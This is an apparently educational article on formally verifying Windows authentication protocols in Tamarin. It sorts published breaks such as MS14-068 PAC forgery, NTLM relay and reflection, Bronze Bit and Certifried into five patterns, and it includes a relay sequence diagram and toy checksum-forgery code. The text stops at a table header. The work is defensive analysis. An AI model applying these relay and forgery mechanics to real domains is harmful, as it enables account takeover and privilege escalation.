Parag Mali

Five Ways Windows Authentication Breaks: A Machine-Checked Tour -- and Why Finding Nothing New Is the Point

noreply@paragmali.com (Parag Mali) — Fri, 12 Jun 2026 00:00:00 GMT

Twenty-three Windows `[MS-*]` authentication protocols, machine-checked in the Tamarin prover under one network ("Dolev-Yao") adversary, each as a flawed/fixed pair reproducing a known, published break -- turned up **zero new vulnerabilities**. That is the point. Nearly every Windows-auth failure within symbolic reach collapses into **five recurring structural patterns**: missing channel binding, keyed-vs-unkeyed integrity, symmetric-credential reflection, identity-binding gaps, and delegation or composition failure. Deepening the models proved *positive* guarantees too -- forward secrecy and key-compromise-impersonation resistance for PKINIT-DH and IKE, hybrid post-quantum transcript binding, Silver-Ticket containment. The catch, and the honest core, is the **symbolic/computational boundary**: a perfect-crypto model sees protocol *logic*, not the probabilistic flaws (like Zerologon's zero-IV) that live one layer down.

1. Was Kerberos Broken, or Did It Just Look Broken?

In 2014, a domain user could become a domain administrator by changing a single field in a Kerberos ticket [@cve-2014-6324]. Not by breaking any cryptography. The attacker built a Privilege Attribute Certificate that claimed membership in the administrators group, signed it with a checksum that needed no secret key, and handed it to the domain controller. The controller checked the signature, found it valid, read the forged groups, and issued back a ticket carrying full administrative authority [@cve-2014-6324]. Microsoft shipped MS14-068, the hole closed, and the penetration testers moved on [@ms14-068].

A signed data structure that Kerberos carries inside a ticket to tell a service who you are and which groups you belong to. Windows trusts the PAC for authorization decisions, so anyone who can forge a PAC the server will accept can rewrite their own group memberships [@ms-pac].

The patch fixed the bug. It never answered the question underneath it: was Kerberos broken, or did it just look broken? The whole escalation turned on one mechanism -- whether the controller demanded a keyed signature or accepted an unkeyed checksum. Flip that one switch and the verdict flips with it.

flowchart TD A[User submits a ticket request with a self-made PAC] --> B{"Does the KDC require a keyed signature on the PAC?"} B -->|"No, pre-patch"| C[Unkeyed checksum, recomputable by anyone] C --> D[Forged group memberships accepted] D --> E[User gains domain administrator authority] B -->|"Yes, MS14-068 fix"| F[Forged PAC fails verification] F --> G[Request rejected, privileges unchanged]

Windows runs dozens of authentication protocols, each specified in a Microsoft [MS-*] open specification and each broken, at some point, by its own published CVE. The bulletin recorded MS14-068 only as a privately reported vulnerability and named no discoverer.The widely repeated attribution to Tom Maddock is community folklore, not a vendor confirmation; the bulletin itself says only "privately reported" [@ms14-068]. So here is the question this article answers. I took 23 of those [MS-*] protocols and machine-checked them in the Tamarin prover under one network attacker, each modeled as a flawed version that reproduces its real break and a fixed version that closes it. The result was zero new vulnerabilities -- and that is the finding worth your time.

Three claims, in order. First, the analysis surfaced nothing new: every break it exhibits was already published. Second, nearly every one of those breaks, across protocols that share no code, collapses into just five recurring structural patterns. Third, finding nothing new across a corpus this well-studied is not an anticlimax -- it is the evidence that the five patterns are real and that the protocols, within the model, behave as their specifications claim.

Note: This is a tour of protocol logic -- the failures a symbolic model can see. It does not cover offline password cracking, credential theft, or stolen-key attacks. Those live one layer down, and Section 9 explains exactly why a perfect-crypto model is blind to them.

By the end you will have a vocabulary that predicts where an authentication protocol is likely to break before you have read a line of its CVE history. To explain why finding nothing can be a finding, though, we have to back up four decades -- to the first time a machine found a break that every human had missed.

2. Why Anyone Models Protocols at All

The Needham-Schroeder public-key protocol was published in 1978 and taught as correct for seventeen years [@needham-schroeder].Lowe's first attack appeared in 1995 -- seventeen years after the 1978 publication -- with the model-checked break-and-fix following in 1996 [@lowe-nsfdr-ps]. The protocol was used, taught, and trusted the entire time -- which is precisely why a machine-checkable method, rather than careful reading, turned out to matter. Then Gavin Lowe pointed a model checker at it and the tool found a man-in-the-middle in an afternoon: an attacker can interleave two runs so that the responder completes believing it authenticated the initiator, when it actually ran with the attacker [@lowe-nsfdr-ps]. The attack had been sitting in plain sight the whole time. How did we get a machine that could find what a generation of careful readers had missed?

The answer is a forty-year lineage, and it starts with a precise definition of the enemy. Needham and Schroeder gave the field its genre -- the challenge-response authentication handshake -- and, with it, a habit of arguing informally that a protocol "obviously" works [@needham-schroeder]. Five years later Danny Dolev and Andrew Yao replaced the hand-waving with a model so pessimistic it became the foundation of everything after it [@dolev-yao-ieee].

The attacker *is* the network. It can read, drop, replay, reorder, and inject any message; it can start any number of sessions; and it composes honest parties however it likes. The one thing it cannot do is break cryptography, which the model treats as perfect: ciphertext reveals nothing without the key, and signatures cannot be forged. Security means holding against this worst-case network attacker [@dolev-yao-ieee].

That single abstraction is the load-bearing assumption behind every result in this article, and behind its central limitation. By assuming perfect cryptography, the Dolev-Yao model throws away the bit-level details so it can reason cleanly about message flow -- which is exactly why it sees logic flaws and misses arithmetic ones.

Symbolic analysis models messages as abstract terms and assumes cryptography is perfect, so it reasons about protocol *logic* under a Dolev-Yao attacker. Computational analysis models messages as bitstrings and the attacker as a probabilistic polynomial-time algorithm, so it reasons about *probabilities*, key sizes, and the strength of primitives. The two methods answer different questions and see different failures [@sok-cac].

Next came a tool to reason inside the model. Burrows, Abadi, and Needham published BAN logic in 1990, a belief calculus that let analysts write down what each party is entitled to conclude from the messages it sees, layered on top of the Dolev-Yao attacker rather than inventing it [@ban-logic]. BAN made formal reasoning usable. It also showed how a verification method can be confidently wrong.

In 1990 Dan Nessett published a protocol that BAN logic "proves" secure even though it transmits the session key signed under a private key, so anyone with the corresponding public key can recover it -- the key is effectively in the clear [@nessett]. The lesson is not that BAN was useless; it is that a proof inherits the blind spots of its model. The same caution governs everything a symbolic prover tells us today.

Then the machines arrived. Lowe's 1996 break used the FDR refinement checker, and his paper did something subtle that turned out to matter for decades: it did not just break the protocol, it fixed it and re-checked the repair [@lowe-nsfdr-ps]. Break, patch, prove the patch -- that loop is the direct ancestor of the method in this article. Automated provers followed, in two families ordered by power rather than by date. Lowe's FDR sits at the head of the bounded, finite-state lineage -- explore every protocol run up to a fixed size -- a line later consolidated into toolsets such as AVISPA in 2005 [@avispa]. The unbounded symbolic provers, which lift that ceiling to arbitrarily many sessions, were led by ProVerif in 2001 [@blanchet-proverif] and eventually Tamarin in 2013 [@tamarin-cav].The split is conceptual, not a timeline: AVISPA (CAV 2005) [@avispa] postdates ProVerif (CSFW 2001) [@blanchet-proverif] by four years, and the genuinely earlier bounded exemplar is Lowe's FDR in 1996 [@lowe-nsfdr-ps].

Machines find what intuition misses. Lowe's 1996 result was not a cleverer human reading; it was a tool exploring runs a human would never enumerate by hand.

While that method matured, a second, separate history was unfolding inside Windows. The protocols Kerberos, NTLM, CredSSP, LDAP, and their relatives were each specified in a Microsoft [MS-*] document [@ms-nlmp] [@ms-pac] and each broken, in turn, by its own CVE across more than twenty years -- the breaks Section 4 lays out end to end. The two lineages -- method and application -- ran side by side and barely touched.

flowchart LR subgraph M["Method lineage"] M1[Needham-Schroeder 1978] --> M2[Dolev-Yao adversary 1983] M2 --> M3[BAN belief logic 1990] M3 --> M4[Lowe and FDR model checker 1996] M4 --> M5[Unbounded provers, ProVerif 2001] M5 --> M6[Tamarin 2013] end subgraph A["Windows application lineage"] A1[SMBRelay 2001] --> A2[MS08-068 2008] A2 --> A3[MS14-068 2014] A3 --> A4[Relay family 2017-2019] A4 --> A5[Bronze Bit 2020 and Certifried 2022] end M6 --> C[One adversary, whole corpus] A5 --> C

Lowe broke one protocol and fixed it. The Windows world had dozens, and for two decades each one was broken, and patched, entirely on its own. The first people to point the new machines at these specific protocols could say something rigorous about each -- but only one at a time.

3. One Protocol at a Time

The machines did get pointed at the protocols Windows actually runs, and the early results were genuinely good. They were also, by construction, local.

Start with public-key Kerberos. PKINIT lets a client authenticate to the Key Distribution Center with a certificate instead of a password, extending the Kerberos V5 service defined in RFC 4120 [@rfc4120].PKINIT is the public-key front door to Kerberos: it is how smart-card logon [@ms-pkca] and Windows Hello for Business [@whfb-auth] get an initial ticket. In 2006, Cervesato, Jaggard, Scedrov, Tsay, and Walstad formally analyzed it and found a man-in-the-middle: the KDC's reply was not bound to the requesting client's identity, so an insider could sit between a client and the KDC and make the client accept a session it never established [@cjstw-eprint]. They did not stop at the break. They specified fixes that bind the reply to the client and machine-checked the repair [@cjstw-asian], with the canonical journal version following in 2008 [@cjstw-infcomput]. Break, fix, prove the fix -- Lowe's loop, applied to a protocol shipping in every enterprise.

Two years later, in 2008, Armando, Carbone, Compagna, Cuellar, and Tobarra turned the same lens on SAML 2.0 web-browser single sign-on, the protocol family behind federated login. A missing binding between an assertion and its intended audience let a dishonest service provider redirect a user's authentication to a different one, breaking SSO for Google Apps as their worked example [@armando-saml]. A few years later Cas Cremers re-analyzed IPsec's IKEv1 and IKEv2 and showed cross-mode confusion: properties that hold for one authentication mode can fail once an attacker mixes modes the designers reasoned about separately [@cremers-ipsec].

Underneath two of those results sat one idea that had already been named. In 2003, Asokan, Niemi, and Nyberg described the man-in-the-middle in tunnelled authentication protocols: when an inner authentication runs inside an outer protected channel without being bound to it, an attacker can relay the inner exchange through a channel of its own choosing [@asokan-spw-doi]. Their fix was a cryptographic binding between the inner authentication and the protection protocol [@asokan-eprint] -- the academic root of what Windows would later call channel binding, and the seed of the first of our five patterns.

Each of these was rigorous. Each shipped a real fix that is still in the specifications today. But notice the shape of the work: every analysis built its own model of the attacker, its own idealization of the protocol, its own security goals. PKINIT's adversary was not SAML's adversary, which was not IKE's. So when a practitioner squinted and said "these all feel like the same mistake," that intuition had nowhere rigorous to land. The recurrence was an analogy across papers that did not share a model.

That is the wall the rest of this article is built to climb. Every one of these was a verdict on a single protocol. Nobody had asked, in a checkable way, what the breaks had in common -- because with a different model under each one, nobody could.

4. Twenty Years, the Same Five Mistakes

Lay the famous Windows-auth breaks end to end and a shape jumps off the page. SMBRelay in 2001, NTLM credential reflection in 2008, the unkeyed Kerberos checksum in 2014, a cluster of relay and channel-binding failures from 2017 to 2019, the Bronze Bit delegation bypass in 2020, the Certifried certificate misissuance in 2022. Different teams, different protocols, different decades -- and a small number of mistakes underneath, repeating.

Year	Public break	Protocol	The mechanism that failed	Pattern
2001	SMBRelay [@cdc-smbrelay]	SMB / NTLM	authenticator not bound to the channel it was used on	1
2008	MS08-068, CVE-2008-4037 [@ms08-068]	NTLM (SMB)	a credential reflected straight back at its sender	3
2014	MS14-068, CVE-2014-6324 [@cve-2014-6324]	Kerberos PAC	an unkeyed checksum accepted where a keyed signature was required	2
2017	CVE-2017-8563 [@cve-2017-8563]	LDAP	the bind not bound to the TLS channel underneath it	1
2018	CVE-2018-0886 [@cve-2018-0886]	CredSSP	the key-authentication value not bound to the TLS session	1
2019	CVE-2019-1040 [@cve-2019-1040]	NTLM	an integrity field stripped without invalidating the signature	1
2020	CVE-2020-17049 (Bronze Bit) [@cve-2020-17049]	Kerberos S4U	a delegation restriction not protected by a keyed signature	5
2022	CVE-2022-26923 (Certifried) [@cve-2022-26923]	AD CS	a certificate subject not bound to the requester's identity	4

The first entry is the oldest and the least formal. SMBRelay was demonstrated by the handle Sir Dystic in 2001, and its provenance is an archived Cult of the Dead Cow page rather than an academic paper [@cdc-smbrelay].That archival fragility is itself worth noting: a foundational attack in Windows security history survives mainly as a web-archive snapshot, not a citable primary [@cdc-smbrelay]. It showed that an NTLM authenticator, captured on one connection, could be forwarded to a second service that would happily accept it.

timeline title Windows authentication breaks, 2001-2022 2001 : SMBRelay, NTLM relayed to a second service 2008 : MS08-068, NTLM credential reflection 2014 : MS14-068, unkeyed PAC checksum forged 2017 : CVE-2017-8563, LDAP bind unbound from TLS 2018 : CVE-2018-0886, CredSSP TLS splice 2019 : CVE-2019-1040, drop-the-MIC integrity strip 2020 : CVE-2020-17049, Bronze Bit delegation bypass 2022 : CVE-2022-26923, Certifried misissuance

Every one of these got a fix, and every fix was sound. Channel binding closed the relay and tunnelling failures, formalized for TLS as the bindings in RFC 5929 [@rfc5929]. Requiring a keyed signature closed the forged-PAC escalation [@cve-2014-6324]. Detecting and rejecting a reflected authenticator stopped NTLM credential reflection: MS08-068 changed the way SMB validates authentication replies, so a credential bounced straight back at its sender no longer passes [@ms08-068]. Binding an issued token to its audience and its requester closed the misissuance and redirection failures [@cve-2022-26923]. Protecting a delegation flag with a key closed the Bronze Bit bypass [@cve-2020-17049]. Each repair was correct, shipped quickly, and -- this is the important part -- entirely local to its own protocol.

That locality is the trap. NTLM reflection [@ms08-068] and the unkeyed PAC checksum [@cve-2014-6324] are the same family of mistake -- trusting an integrity value that carries no secret or no direction -- yet they live in protocols that share no code and were fixed years apart by different teams. The relay family of 2017 through 2019 [@cve-2017-8563] [@cve-2018-0886] [@cve-2019-1040] is one idea, missing channel binding, wearing three protocol costumes. Bronze Bit [@cve-2020-17049] and Certifried [@cve-2022-26923] rhyme with breaks a decade older. The pattern is real, but it is spread across the seams between protocols, exactly where per-protocol work cannot look.

Key idea: Per-CVE point-fixing is indispensable engineering and a terrible microscope for structure. Each patch is local to one protocol, and each one-protocol analysis rebuilds the attacker model from scratch. So the recurring shape is invisible by construction: you cannot see a cross-protocol pattern one protocol at a time. The fixes were never wrong -- they were just the wrong instrument for the question "what keeps going wrong?"

Which sets up the move the rest of the article depends on. If the shapes are real, you should be able to prove they are real -- not protocol by protocol, but all of them at once, every model facing the same attacker, with the recurrence stated as a checkable claim rather than a feeling. What would it take to build that?

5. One Adversary, One Method, the Whole Corpus

The move that makes the recurrence checkable is almost embarrassingly simple to state: model 23 of the [MS-*] protocols in a single prover, under one shared attacker, and for each known break build not two models but three. I used the Tamarin prover for this, and its feature list is the reason [@tamarin-cav].

Tamarin represents a protocol as multiset-rewriting rules over a mutable global state, reasons natively about Diffie-Hellman exponentiation, and verifies properties over an unbounded number of sessions rather than a fixed few [@tamarin-cav]. It produces both proofs and concrete attack traces, and it has been used on protocols at the scale of TLS 1.3, 5G-AKA, and EMV [@tamarin-home]. Windows authentication needs exactly that combination: key exchange with real DH and post-quantum KEMs, credential state that changes as tickets are issued, unbounded concurrent sessions, and the ability to show both that a fix works and that the flawed version breaks. Security goals are written as trace properties.

A security goal phrased as a statement about every possible run of the protocol: on no trace does something bad happen. Secrecy says no run ever leaks the secret to the attacker. Agreement says that whenever one party finishes believing it authenticated another, that other party really did take part in a matching run [@tamarin-manual]. Agreement strengthened with a one-to-one matching between a party's completed runs and its peer's genuine runs, so that no single legitimate exchange can be replayed to satisfy two separate acceptances. Injectivity is the part of the property that rules out replay [@tamarin-manual].

The third model is the one that turns analogy into evidence.

Three models of the same protocol. The *fixed* model includes the defended mechanism and verifies the security lemma. The *flawed* model removes exactly that one mechanism, and the same lemma falsifies -- reproducing the published break. The *control* re-enables the mechanism and the lemma verifies again. Because only one thing changed between the three, the cause of the break is pinned to that mechanism rather than to some accident of how the model was written [@lowe-nsfdr-ps].

Here is one lemma, in Tamarin's own property language, for the MS14-068 case -- the claim that only the KDC can produce a PAC a server will accept:

lemma pac_only_kdc_can_sign:
  "All srv pac #i.
       AcceptPAC(srv, pac) @i
   ==> ( Ex #j. KdcSignedPAC(pac) @j & j < i )
     | ( Ex #r. RevealKey('krbtgt') @r )"

Read it as: on every trace, if a server accepts a PAC at time i, then either the KDC actually produced that PAC's keyed signature earlier, or the long-term krbtgt key was revealed [@tamarin-manual]. In the fixed model, where the integrity check is a keyed signature under krbtgt, Tamarin finds no violating trace and the lemma holds for unbounded sessions. In the flawed model, where the server accepts an unkeyed checksum, Tamarin returns a concrete counterexample -- an acceptance with no prior KDC signature and no key reveal -- which is the forged-PAC escalation, machine-checked [@cve-2014-6324]. The operators and templates are standard Tamarin; the action-fact names are the model's own and are not themselves a citable claim.

Two disciplines keep this honest. The first guards against a lemma that is true only because nothing ever reaches it.A property can be vacuously satisfied if no honest run ever triggers its premise. Non-vacuity sanity lemmas prove an honest party really can complete the protocol, so a "verified" guarantee has teeth rather than being true by absence [@tamarin-manual]. The second guards against overclaiming: every falsification is matched to a published CVE or paper before I call it a reproduction. Nothing in this corpus is presented as a discovery.

flowchart TD P[One protocol, one Dolev-Yao adversary] --> F[Fixed model, mechanism present] P --> X[Flawed model, one mechanism removed] P --> K[Control model, mechanism re-enabled] F --> FR[Security lemma verifies] X --> XR[Same lemma falsifies, the published break] K --> KR[Same lemma verifies again] FR --> D{"Did only the toggled mechanism move the verdict?"} XR --> D KR --> D D -->|Yes| C[Cause localized to the mechanism, not the harness]

Key idea: The control model is the difference between a story and a proof. Without it, "these breaks are all the same pattern" is a nice grouping of war stories. With it, the claim becomes machine-checked and specific: toggle this one mechanism and the security property flips, restore it and the property returns. The recurrence is no longer an analogy across papers -- it is a falsifiable statement about a mechanism, repeated across protocols that share no code.

Finding nothing new across a well-studied corpus is not a null result. It is the evidence that the taxonomy is real -- the protocols behave, within the model, exactly as their fixes claim.

With the instrument built, the corpus gives up its structure without much further argument. There are five shapes. Here is each one, with the worked break behind it.

6. The Five Patterns

Before you read a single CVE, ask five questions of any authentication protocol. Each question targets one of the recurring shapes, and a "no" to any of them names the family of break to expect. This decision tree is the article's centerpiece -- the audit you can run from memory.

flowchart TD S[Any authentication protocol] --> Q1{"Is every authenticator bound to the channel and endpoint it is used on?"} Q1 -->|No| P1[Pattern 1, relay and MITM] Q1 -->|Yes| Q2{"Is every integrity check keyed, never a bare checksum?"} Q2 -->|No| P2[Pattern 2, keyed-vs-unkeyed confusion] Q2 -->|Yes| Q3{"Does every symmetric credential carry a direction or role tag?"} Q3 -->|No| P3[Pattern 3, credential reflection] Q3 -->|Yes| Q4{"Does every signed token bind requester, key, and audience?"} Q4 -->|No| P4[Pattern 4, identity-binding gap] Q4 -->|Yes| Q5{"Does every delegation chain keep its restriction under composition?"} Q5 -->|No| P5[Pattern 5, delegation and composition] Q5 -->|Yes| OK[No break in these five shapes within symbolic reach]

Pattern	The mechanism that fails	Worked break	The fix	Public anchor
1. Channel binding	authenticator not bound to its channel or endpoint	NTLM relay, drop-the-MIC, CredSSP, LDAP	TLS channel binding, SPNEGO mechListMIC	[@rfc5929] [@cve-2019-1040]
2. Keyed-vs-unkeyed	an unkeyed checksum accepted as integrity	MS14-068 PAC forgery	require a keyed KDC signature	[@cve-2014-6324]
3. Reflection	a symmetric credential with no direction tag	NTLM credential reflection (MS08-068)	reflection/replay detection (a direction tag in the model)	[@ms08-068] [@cve-2008-4037]
4. Identity binding	a token not bound to requester, key, or audience	PKINIT, SAML SSO, Certifried	bind reply, audience, and subject	[@cve-2022-26923] [@rfc4556]
5. Delegation	a restriction not preserved across a chain	Bronze Bit S4U	protect the flag with a keyed signature	[@cve-2020-17049]

Note: These five questions are a predictive vocabulary. You do not need to formally model a protocol to ask them, and you do not need its CVE history. A "no" to any question tells you which family of failure to look for first -- which is what a taxonomy is for.

Pattern 1: Missing or ignored channel binding

The first pattern is the relay. An authenticator -- an NTLM response, a signed bind, a delegated credential -- is computed without naming the channel it is supposed to travel on, so an attacker can carry it to a different service that will accept it just the same. This is the modern form of the tunnelled-authentication man-in-the-middle that Asokan, Niemi, and Nyberg described in 2003 [@asokan-spw-doi].

Channel binding ties an inner authenticator to the outer channel it travels on, usually identified by the TLS endpoint [@rfc5929]. Windows ships it as Extended Protection for Authentication (EPA) and a Channel Binding Token (CBT) [@adv190023]. With the binding present, an authenticator captured on one connection is useless on another, because it names the channel it was made for.

The worked model is NTLM. With no channel binding, a victim's NTLM exchange relays cleanly to a second service [@ms-nlmp]; add the binding and the relayed authenticator no longer matches the channel it arrives on, and the target rejects it.

sequenceDiagram participant V as Victim client participant M as Attacker relay participant T as Target server V->>M: Connect, NTLM NEGOTIATE M->>T: Relay NEGOTIATE as the victim T->>M: NTLM CHALLENGE, server nonce M->>V: Forward the same CHALLENGE V->>M: NTLM AUTHENTICATE over the nonce M->>T: Relay AUTHENTICATE unchanged Note over M,T: No channel binding, so the target cannot tell the response came from a different connection T->>M: Access granted as the victim

The same shape recurs across protocols that share no code. CredSSP failed to bind its pubKeyAuth value to the TLS session, so a man-in-the-middle could splice itself into an RDP credential handshake [@cve-2018-0886]. LDAP accepted a bind without tying it to the TLS channel underneath, and Microsoft's own documentation is blunt that the default performed no channel-binding validation at all [@kb4034879] [@cve-2017-8563]. The companion guidance spells out the man-in-the-middle risk [@kb4520412] under the umbrella advisory for LDAP hardening [@adv190023]. And drop-the-MIC removed NTLM's integrity check without invalidating the surrounding signature.drop-the-MIC strips the NTLM message-integrity check from the negotiated flags without invalidating the outer signature, so a tampered exchange still verifies as authentic [@cve-2019-1040].

The fixes are all the same idea wearing different names: the TLS channel bindings tls-server-end-point and tls-unique defined in RFC 5929 [@rfc5929], and the SPNEGO mechListMIC that stops a negotiation downgrade [@rfc4178]. One subtlety decides whether the fix actually closes the door.RFC 5929's tls-server-end-point hashes the server certificate, so it is per-certificate, not per-service. Two services sharing one certificate share one binding value -- which is exactly the gap that kept some LDAP deployments relayable even after binding was nominally enabled [@rfc5929].

Pattern 2: Keyed-vs-unkeyed integrity

The second pattern is a confusion between two things that look alike and behave nothing alike: a checksum and a keyed signature.

A checksum -- a CRC, a bare hash -- detects accidental corruption and needs no secret, so anyone can recompute it over data they forged. A message authentication code or signature is *keyed*: producing a valid tag requires a secret held by the legitimate sender -- a shared key the verifier also holds (a MAC), or a private key the verifier checks against the sender's public key (a signature). A verifier that accepts an unkeyed checksum where a keyed tag was required is trusting a value any attacker can produce [@cve-2014-6324].

This is MS14-068 exactly. The KDC accepted a PAC whose integrity "signature" could be an unkeyed checksum, so a user could forge group memberships and compute a matching checksum themselves [@cve-2014-6324]. Require that the PAC carry a keyed signature under the krbtgt key, and the same forgery fails because the user cannot produce the tag [@ms14-068]. The identical class shows up at the server-to-domain-controller PAC validation step, where a service asks a DC to vouch for a ticket's PAC [@ms-pac]. The fix and the failure are one mechanism, toggled.

{` // A toy checksum: no secret, so anyone can recompute it over any data. function checksum(data) { let sum = 0; for (const ch of data) sum = (sum + ch.charCodeAt(0)) % 65521; return sum; } // A toy keyed tag: the value depends on a secret the attacker does not hold. function tag(key, data) { let acc = key.length * 131; for (const ch of (key + data)) acc = (acc * 31 + ch.charCodeAt(0)) % 1000003; return acc; }

const forged = "groups=domain-admins";

// Unkeyed: the attacker computes the same checksum the verifier will recompute. const attached = checksum(forged); const verifier = checksum(forged); console.log("unkeyed checksum accepts forged data:", attached === verifier); // true

// Keyed: without the KDC secret, the attacker cannot match the expected tag. const kdcSecret = "krbtgt-secret"; const serverExpects = tag(kdcSecret, forged); const attackerTag = tag("no-secret", forged); console.log("forged keyed tag accepted:", attackerTag === serverExpects); // false `}

Pattern 3: Symmetric-credential reflection

The third pattern is reflection. A credential computed by a keyed function that carries no direction or role tag can be bounced back at the party that produced it. The canonical Windows instance is NTLM credential reflection, fixed in MS08-068 [@ms08-068]: an attacker who receives a victim's challenge-response can send that same authenticator back to the victim's own machine and be accepted as the victim [@cve-2008-4037]. It sits in the SMBRelay lineage that opened our timeline [@cdc-smbrelay].

The toggle is a direction tag. Remove it and the value a client produces is exactly the value a server will accept, so the reflection works. Restore a role offset -- so the two directions compute different values -- and the reflected response no longer matches.

{` // A symmetric response: both ends compute the same function of nonce and key. function respond(key, nonce, role) { let acc = 0; for (const ch of (role + key + nonce)) acc = (acc * 33 + ch.charCodeAt(0)) % 1000003; return acc; }

const key = "shared-session-key"; const nonce = "server-nonce-1234";

// No direction tag: what a client sends equals what a server would accept. const clientSends = respond(key, nonce, ""); const serverAccepts = respond(key, nonce, ""); console.log("reflected response accepted, no tag:", clientSends === serverAccepts); // true

// With a direction tag, the two directions diverge and reflection fails. const clientTagged = respond(key, nonce, "client-to-server"); const serverTagged = respond(key, nonce, "server-to-client"); console.log("reflected response accepted, tagged:", clientTagged === serverTagged); // false `}

There is one place this pattern is easy to overclaim, and the honesty frame of this whole article depends on not doing so.In my Tamarin model of [MS-NRPC], a client may pick its Netlogon NetrServerAuthenticate3 challenge to coincide with the server's -- a structural reflection the symbolic model can express. This is a modeling observation, not a separately published Netlogon weakness; the famous Zerologon escalation turns on the computational AES-CFB8 zero-IV weakness that a perfect-crypto model cannot represent. Zerologon appears here only as the Section 9 boundary illustration -- encoded as an equation, never discovered [@cve-2020-1472].

Pattern 4: Identity-binding gaps in signed tokens

The fourth pattern is a signed thing -- a reply, a ticket, an assertion, a certificate -- that is correctly signed and yet fails to bind who it is for. PKINIT is the textbook case: the KDC's reply was not bound to the requesting client's identity, the gap Cervesato and colleagues formalized [@cjstw-infcomput]. In Diffie-Hellman mode this becomes an unknown-key-share risk, where a client can be steered into misattributing a key. The fix binds the request itself with the paChecksum defined in RFC 4556 Section 3.2.1, a checksum over the request body [@rfc4556]. RFC 8636 later made its hash negotiable under "paChecksum Agility" -- it did not add the field, it standardized the field's agility [@rfc8636].

The same gap appears wherever a token crosses a trust boundary. SAML single sign-on needed an audience restriction so an assertion minted for one service could not be redirected to another [@armando-saml]. AD CS certificate enrollment needed the issued certificate's subject bound to the requester's real identity -- absent that, the Certifried technique let a low-privilege account enroll a certificate for a domain controller [@cve-2022-26923], a later escalation across the AD CS attack surface that SpecterOps's Certified Pre-Owned had first mapped in June 2021 [@specterops-cpo]. OAuth's on-behalf-of exchange needs its token audience checked to avoid a confused-deputy redirection [@rfc6819], and device registration needs a proof-of-possession binding so a bearer token cannot be replayed against a key the device never held [@rfc7800].

Pattern 5: Delegation and composition

The fifth pattern is the subtlest, because every component is sound on its own. The failure lives in the chain. Kerberos constrained delegation lets a service act on a user's behalf, gated by whether a ticket is marked forwardable. The Bronze Bit technique flipped that restriction: a compromised service could tamper with a service ticket that was not valid for delegation and force the KDC to accept it, because the relevant integrity was not protected by the KDC's own ticket signature [@cve-2020-17049]. Restore the check on the krbtgt ticket signature and the tampered ticket is rejected [@netspi-bronzebit].

Composition multiplies the surface. Resource-based constrained delegation chains can be assembled into escalation paths that no single hop authorizes [@shamir-wagging]. A cross-protocol NTLM relay shares one credential across SMB, LDAP, and CredSSP at once, so a binding omitted in any one leg reopens the whole composition. And IKE's cross-mode confusion is a composition failure at the key-exchange layer, where mixing modes defeats a property each mode satisfies alone [@cremers-ipsec].

You can run these five questions against a protocol you have never modeled formally and never will: channel binding, keyed integrity, direction tags, identity binding, and a restriction that survives composition. Asked of a design document, they catch the families behind two decades of Windows-auth CVEs before any of them ships. Section 11 turns them into a checklist, each paired with the fix that already exists.

Every pattern so far is a way something broke. But the instrument that exhibits a break can also prove a guarantee -- and when I pushed twelve of these models under stronger attackers, what came back was not new bugs but stronger proofs. What did the deep models actually prove?

7. What the Deep Models Proved

A prover does not only produce counterexamples. When a lemma holds, you get a proof -- a statement that across every run, under this attacker, nothing violates the property. So I took twelve of the models and deepened them: same protocols, stronger attacker. The headline stayed the same. No new breaks. What changed is that the guarantees got stronger, and I can say precisely which attacker capability each one now survives. Everything below is my Tamarin verification within the Dolev-Yao model, each item anchored to the public specification or CVE it concerns -- not an independently published finding.

A session's keys stay secret even if the parties' long-term keys are compromised later. Traffic captured today remains protected against a key leak tomorrow, because the session key depended on ephemeral values that no longer exist [@rfc4556]. Compromising a party's own long-term key obviously lets an attacker impersonate that party. KCI resistance is the narrower guarantee that it does not *also* let the attacker impersonate other parties *to* the compromised one [@cremers-ipsec].

The deepenings follow a single recipe: add an attacker capability the per-protocol models had assumed away, then see which lemma still holds.

Guarantee	Attacker capability added	Lemma that still holds	Public anchor
Forward secrecy, PKINIT-DH	reveal both client and KDC long-term signing keys after the run	AS reply key stays secret; only the two ephemerals protect it	[@rfc4556]
KCI resistance, PKINIT-DH	compromise the client's own long-term key	client still authenticates the genuine KDC	[@rfc4556]
Mutual auth and PFS, IPsec IKE	ephemeral reveal, then both parties' long-term keys	injective mutual authentication and forward secrecy survive	[@cremers-ipsec]
Hybrid PQ-KEX transcript binding	reveal both the DH and KEM legs (both-leg compromise)	acceptance still binds the genuine transcript and key	author's Tamarin model
Per-channel bindings under composition	one shared NTLMv2 credential feeding SMB, LDAP, and CredSSP under a relay attacker	each acceptor's binding holds inside the composition	[@cve-2019-1040] [@cve-2018-0886] [@cve-2017-8563] [@rfc5929]
SID filtering and Silver-Ticket containment	cross-domain referrals, the full four-signature PAC, and service-key reveal	external forests stay contained; DC-validated PACs defeat Silver Tickets	[@ms-pac]
Bronze-Bit and Protected-User non-delegation	arbitrary service-key compromise across S4U, RBCD, and PKINIT at once	every delegated impersonation traces to a legitimate KDC grant; Protected Users are never delegated	[@cve-2020-17049] [@protected-users] [@shamir-wagging]

A few deserve a sentence. PKINIT's public-key-encryption mode structurally cannot offer forward secrecy, because the reply key arrives encrypted to a long-term key; the DH mode can, and the deepened model proves it does even when both signing keys leak after the run [@rfc4556]. The hybrid post-quantum result is the strongest-sounding and has no public primary, so I flag it as model-only: binding the KEM ciphertext into the transcript keeps a client's acceptance tied to the genuine server even when both the classical and post-quantum legs are revealed. The delegation result matters most operationally: a Protected Users account is never delegated by any path -- classic, resource-based, or PKINIT-issued -- even under arbitrary service-key compromise [@protected-users].

Honesty requires one scar on this table.One deepening did not yield an independent re-proof in my sandbox. The heaviest cross-domain four-signature-PAC model exhausted memory -- an out-of-memory EXIT 137 -- before Tamarin terminated. I record that result as reported, not independently re-proved [@ms-pac]. A guarantee I cannot re-derive is a guarantee I report with an asterisk, not one I assert.

These proofs are strong, but they are exactly as strong as the model they live in -- no stronger. So the fair next question is how Tamarin compares with the other instruments on the bench, and, more pointedly, what it is choosing not to see.

8. Symbolic, Computational, and the Tools Between

Tamarin was the right instrument for this corpus, but it is one of several, and the honest comparison is about what each one buys and what it costs. The computer-aided cryptography community's own survey lays out the taxonomy, and I follow it here [@sok-cac].

The first split is the model. Symbolic tools -- Tamarin, ProVerif, Scyther -- work in the Dolev-Yao world of perfect cryptography and reason about protocol logic. Computational tools -- CryptoVerif, EasyCrypt -- model the attacker as a probabilistic polynomial-time algorithm and produce bounds on its success probability [@sok-cac]. They answer different questions, which is why a single benchmark number rarely transfers between them.

Tool	Model	Termination	DH and state	Style	Best at
